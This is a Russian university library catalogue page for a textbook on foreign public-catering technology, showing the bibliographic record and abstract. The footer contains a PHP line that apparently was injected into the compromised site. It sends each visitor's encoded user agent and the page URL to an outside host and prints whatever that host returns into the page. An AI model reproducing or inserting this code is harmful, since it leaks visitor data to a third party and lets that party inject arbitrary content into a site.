Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

282 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=FE3736AE-D21B-34B2-C6FE-A5E2E910EE0A$")И(("UDC=338.48$")ИЛИ("UDC=796.5$")ИЛИ("UDC=64$")ИЛИ("UDC=332.87$")ИЛИ("UDC=658.64$"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
FE3736AE-D21B-34B2-C6FE-A5E2E910EE0A
(Нет сведений об экземплярах)
FE3736AE-D21B-34B2-C6FE-A5E2E910EE0A
ЭР279
Пасько, Ольга Владимировна.
Технология продукции общественного питания за рубежом: учебное пособие для прикладного бакалавриата [Электронный ресурс] / О. В. Пасько, Н. В. Бураковская. - Электрон. текстовые дан. - М : Издательство Юрайт, 2018. - 1 on-line. - (Университеты России). - Загл. с титул. экрана. - Электрон. версия печ. публикации. - Авторизованный доступ с 31.10.2018 г. до 30.10.2019 г. - ISBN 978-5-534-07286-0 ЭР279
УДК
641.5(075.8)
ББК
36.99я73

Кл.слова (ненормированные): легкая и пищевая промышленность -- прикладные науки -- технологии и организация услуг питания -- технологии пищевых производств -- технологии пищевых производств малых предприятий -- технология продукции общественного питания -- пищевое производство -- продукты питания -- горячая кулинарная продукция -- холодная кулинарная продукция -- общественное питание -- пищевая промышленность -- техника -- питание
Аннотация: В учебном пособии представлены современные тенденции, направления, особенности, традиции и технологии кулинарной продукции в европейских странах, странах ближнего зарубежья, Южной и Северной Америки, Восточной Азии. Пособие включает лабораторный практикум, в котором представлено подробное описание технологии приготовления и оформления блюд. В приложениях представлены технологические карты, в которых указан набор продуктов на одну порцию массой брутто, массой нетто и выход готового изделия в граммах.
Доп. точки доступа:
Бураковская, Нина Владимировна

Нет сведений об экземплярах
Держатели документа:
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11
Держатели документа (Информация об экземплярах) 

В учебном пособии представлены современные тенденции, направления, особенности, традиции и технологии кулинарной продукции в европейских странах, странах ближнего зарубежья, Южной и Северной Америки, Восточной Азии. Пособие включает лабораторный практикум, в котором представлено подробное описание технологии приготовления и оформления блюд. В приложениях представлены технологические карты, в которых указан набор продуктов на одну порцию массой брутто, массой нетто и выход готового изделия в граммах.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 2.50 с.14 запросов, 2.36c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;